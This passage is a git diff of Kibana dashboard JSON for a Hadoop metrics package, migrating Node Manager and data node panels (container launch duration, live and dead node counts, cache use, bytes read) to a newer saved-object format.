] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", - "title": "Container average launch duration over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Containers" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "052473c7-2ada-4644-b652-9157af03b3b0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ba699ab1-d553-4822-aadd-db43254f7ab0": { - "columnOrder": [ - "d751311f-5a11-4dcb-a55a-78ef1be7d79e" - ], - "columns": { - "d751311f-5a11-4dcb-a55a-78ef1be7d79e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.container_launch_duration_num_ops: *" - }, - "isBucketed": false, - "label": "Container Launch Duration (Num of Operations)", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.container_launch_duration_num_ops" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "052473c7-2ada-4644-b652-9157af03b3b0", - "key": "hadoop.node_manager.container_launch_duration_num_ops", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.container_launch_duration_num_ops" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "d751311f-5a11-4dcb-a55a-78ef1be7d79e", - "layerId": "ba699ab1-d553-4822-aadd-db43254f7ab0", - "layerType": "data", - "textAlign": "center", - "titlePosition": "bottom" - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of containers over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", + "w": 21, + "x": 27, + "y": 0 + }, + "panelIndex": "7f0d3056-6f50-4be9-8a4b-cd51685676ec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d73deed1-d0bd-4f83-8759-602565e70486", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ee8bbb4c-7f64-46b1-965b-daec27ad4251": { + "columnOrder": [ + "49bd7898-d477-456f-bebd-db0024ea1510", + "96afed27-0108-42ad-a3c6-26f51cd509a2" + ], + "columns": { + "49bd7898-d477-456f-bebd-db0024ea1510": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "96afed27-0108-42ad-a3c6-26f51cd509a2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.container_launch_duration_avg_time: *" + }, + "isBucketed": false, + "label": "Container Launch Duration Avg Time (s)", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.container_launch_duration_avg_time" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d73deed1-d0bd-4f83-8759-602565e70486", + "key": "hadoop.node_manager.container_launch_duration_avg_time", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.container_launch_duration_avg_time" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 6, - "i": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", - "w": 21, - "x": 27, - "y": 14 + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", - "title": "Container launch duration number of operations [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Node Manager", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de277d30-051b-4343-b67b-b6b243c140f2:6c5f4d9b-3a70-4c21-a292-32654686b081", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "type": "index-pattern" + "layers": [ + { + "accessors": [ + "96afed27-0108-42ad-a3c6-26f51cd509a2" + ], + "layerId": "ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "49bd7898-d477-456f-bebd-db0024ea1510", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "96afed27-0108-42ad-a3c6-26f51cd509a2" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Seconds" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:d73deed1-d0bd-4f83-8759-602565e70486", - "type": "index-pattern" + "title": "Container average launch duration over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", + "w": 21, + "x": 27, + "y": 14 }, - { - "id": "metrics-*", - "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", - "type": "index-pattern" + "panelIndex": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "052473c7-2ada-4644-b652-9157af03b3b0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ba699ab1-d553-4822-aadd-db43254f7ab0": { + "columnOrder": [ + "d751311f-5a11-4dcb-a55a-78ef1be7d79e" + ], + "columns": { + "d751311f-5a11-4dcb-a55a-78ef1be7d79e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.container_launch_duration_num_ops: *" + }, + "isBucketed": false, + "label": "Container Launch Duration (Num of Operations)", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.container_launch_duration_num_ops" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "052473c7-2ada-4644-b652-9157af03b3b0", + "key": "hadoop.node_manager.container_launch_duration_num_ops", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.container_launch_duration_num_ops" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d751311f-5a11-4dcb-a55a-78ef1be7d79e", + "layerId": "ba699ab1-d553-4822-aadd-db43254f7ab0", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:052473c7-2ada-4644-b652-9157af03b3b0", - "type": "index-pattern" - } + "title": "Container launch duration number of operations [Metrics Hadoop]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Node Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "de277d30-051b-4343-b67b-b6b243c140f2:6c5f4d9b-3a70-4c21-a292-32654686b081", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7f0d3056-6f50-4be9-8a4b-cd51685676ec:d73deed1-d0bd-4f83-8759-602565e70486", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:indexpattern-datasource-layer-ba699ab1-d553-4822-aadd-db43254f7ab0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8b1e87db-5125-44ad-8e30-bf9ee3e4447b:052473c7-2ada-4644-b652-9157af03b3b0", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json index d85c6386c9c..bbc16094cc3 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json +++ b/packages/hadoop/kibana/dashboard/hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2.json @@ -1,495 +1,1143 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "hadoop-c06fb680-cf76-11ec-bc3e-6faca2b11df2", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMSwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ee57a119-2827-4586-82f1-c796c86d76d9": { + "columnOrder": [ + "abfc2ae3-27f7-4529-a9b9-01d7a9896323", + "0a1b5433-d3cf-4c1d-8e22-137912b624bb" + ], + "columns": { + "0a1b5433-d3cf-4c1d-8e22-137912b624bb": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + "abfc2ae3-27f7-4529-a9b9-01d7a9896323": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Data node address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "service.address" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" " + }, + "visualization": { + "columns": [ + { + "columnId": "abfc2ae3-27f7-4529-a9b9-01d7a9896323", + "isTransposed": false + }, + { + "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", + "isTransposed": false + } + ], + "layerId": "ee57a119-2827-4586-82f1-c796c86d76d9", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "List of data node address [Metrics Hadoop]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "1f52942c-5657-4bab-8e38-5cf69692f448", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "1f52942c-5657-4bab-8e38-5cf69692f448", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "1f52942c-5657-4bab-8e38-5cf69692f448", - "panelRefName": "panel_1f52942c-5657-4bab-8e38-5cf69692f448", - "type": "lens", - "version": "8.3.0" + "panelIndex": "1f52942c-5657-4bab-8e38-5cf69692f448", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", + "w": 12, + "x": 24, + "y": 0 + }, + "panelIndex": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50b51ba8-f87e-405f-8a53-efea43df987b", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8": { + "columnOrder": [ + "f15f3a76-5e86-400f-9af5-c6ab810ffb8e" + ], + "columns": { + "f15f3a76-5e86-400f-9af5-c6ab810ffb8e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_live_data: *" + }, + "isBucketed": false, + "label": "Live Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_live_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "50b51ba8-f87e-405f-8a53-efea43df987b", + "key": "hadoop.namenode.nodes.num_live_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_live_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f15f3a76-5e86-400f-9af5-c6ab810ffb8e", + "layerId": "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50b51ba8-f87e-405f-8a53-efea43df987b", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8": { - "columnOrder": [ - "f15f3a76-5e86-400f-9af5-c6ab810ffb8e" - ], - "columns": { - "f15f3a76-5e86-400f-9af5-c6ab810ffb8e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_live_data: *" - }, - "isBucketed": false, - "label": "Live Data Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_live_data" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "50b51ba8-f87e-405f-8a53-efea43df987b", - "key": "hadoop.namenode.nodes.num_live_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_live_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f15f3a76-5e86-400f-9af5-c6ab810ffb8e", - "layerId": "df057b77-cd5b-4e7a-bb21-ac003f0f4eb8", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", - "w": 12, - "x": 24, - "y": 0 - }, - "panelIndex": "eac20ac9-93ca-483c-ab27-d10a06f4dde0", - "title": "Number of live data nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of live data nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "75574416-a16d-43be-a303-2dc31359a8c9", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "75574416-a16d-43be-a303-2dc31359a8c9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3d40213c-fe67-4c30-bde1-5450fbadcd20": { + "columnOrder": [ + "b48d5a8f-56b6-4418-bab1-ce62ea15f724" + ], + "columns": { + "b48d5a8f-56b6-4418-bab1-ce62ea15f724": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_dead_data: *" + }, + "isBucketed": false, + "label": "Dead Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_dead_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", + "key": "hadoop.namenode.nodes.num_dead_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_dead_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b48d5a8f-56b6-4418-bab1-ce62ea15f724", + "layerId": "3d40213c-fe67-4c30-bde1-5450fbadcd20", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3d40213c-fe67-4c30-bde1-5450fbadcd20", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3d40213c-fe67-4c30-bde1-5450fbadcd20": { - "columnOrder": [ - "b48d5a8f-56b6-4418-bab1-ce62ea15f724" - ], - "columns": { - "b48d5a8f-56b6-4418-bab1-ce62ea15f724": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_dead_data: *" - }, - "isBucketed": false, - "label": "Dead Data Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_dead_data" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0fdf9d17-fb31-40a8-b8db-02850b080c9d", - "key": "hadoop.namenode.nodes.num_dead_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_dead_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of dead data nodes [Metrics Hadoop]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "efa00ae4-03e1-45c9-aaa9-47610de989d9": { + "columnOrder": [ + "5e28f952-df42-4162-8195-af6ee018c227", + "5e28f952-df42-4162-8195-af6ee018c227X0" + ], + "columns": { + "5e28f952-df42-4162-8195-af6ee018c227": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Cache used", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "accessor": "b48d5a8f-56b6-4418-bab1-ce62ea15f724", - "layerId": "3d40213c-fe67-4c30-bde1-5450fbadcd20", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } + "formula": "last_value(hadoop.datanode.cache.used)", + "isFormulaBroken": false + }, + "references": [ + "5e28f952-df42-4162-8195-af6ee018c227X0" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "75574416-a16d-43be-a303-2dc31359a8c9", - "w": 12, - "x": 36, - "y": 0 - }, - "panelIndex": "75574416-a16d-43be-a303-2dc31359a8c9", - "title": "Number of dead data nodes [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" + "5e28f952-df42-4162-8195-af6ee018c227X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Cache used", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.cache.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"hadoop.datanode\" and hadoop.datanode.cache.capacity : * and hadoop.datanode.cache.used : * " + }, + "visualization": { + "accessor": "5e28f952-df42-4162-8195-af6ee018c227", + "layerId": "efa00ae4-03e1-45c9-aaa9-47610de989d9", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 7, - "i": "c8a6b036-ae93-4055-aef7-dd575221f10d", - "w": 12, - "x": 24, - "y": 7 - }, - "panelIndex": "c8a6b036-ae93-4055-aef7-dd575221f10d", - "panelRefName": "panel_c8a6b036-ae93-4055-aef7-dd575221f10d", - "type": "lens", - "version": "8.3.0" + "title": "Cache used from total cache [Metrics Hadoop]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 7, + "i": "c8a6b036-ae93-4055-aef7-dd575221f10d", + "w": 12, + "x": 24, + "y": 7 + }, + "panelIndex": "c8a6b036-ae93-4055-aef7-dd575221f10d", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "f03b0b45-577e-480e-9fb2-9890b62fc30f", + "w": 12, + "x": 36, + "y": 7 + }, + "panelIndex": "f03b0b45-577e-480e-9fb2-9890b62fc30f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4e3e29b3-cd97-447c-b679-0130844d95bb", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570e3d96-2c27-4661-8669-77215711bb6e": { + "columnOrder": [ + "2c8412e8-db24-4dab-8635-32a74ef1873c" + ], + "columns": { + "2c8412e8-db24-4dab-8635-32a74ef1873c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.namenode.nodes.num_decommissioning_data: *" + }, + "isBucketed": false, + "label": "Decommissioning Data Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.namenode.nodes.num_decommissioning_data" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4e3e29b3-cd97-447c-b679-0130844d95bb", + "key": "hadoop.namenode.nodes.num_decommissioning_data", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.namenode.nodes.num_decommissioning_data" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2c8412e8-db24-4dab-8635-32a74ef1873c", + "layerId": "570e3d96-2c27-4661-8669-77215711bb6e", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-570e3d96-2c27-4661-8669-77215711bb6e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4e3e29b3-cd97-447c-b679-0130844d95bb", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "570e3d96-2c27-4661-8669-77215711bb6e": { - "columnOrder": [ - "2c8412e8-db24-4dab-8635-32a74ef1873c" - ], - "columns": { - "2c8412e8-db24-4dab-8635-32a74ef1873c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.namenode.nodes.num_decommissioning_data: *" - }, - "isBucketed": false, - "label": "Decommissioning Data Nodes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.namenode.nodes.num_decommissioning_data" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of data nodes decommissioning [Metrics Hadoop]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "69af342c-71f3-41fe-a76e-cc9f49baafa3": { + "columnOrder": [ + "797ebde1-9d7b-4950-9554-194d5c702684", + "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", + "4b9fcd50-2227-40e5-a93b-ebb16831630d", + "56fd6e61-acf3-45e6-9904-98f7ffa90644" + ], + "columns": { + "4b9fcd50-2227-40e5-a93b-ebb16831630d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4e3e29b3-cd97-447c-b679-0130844d95bb", - "key": "hadoop.namenode.nodes.num_decommissioning_data", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.namenode.nodes.num_decommissioning_data" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.datanode.bytes.read" + }, + "56fd6e61-acf3-45e6-9904-98f7ffa90644": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes written", 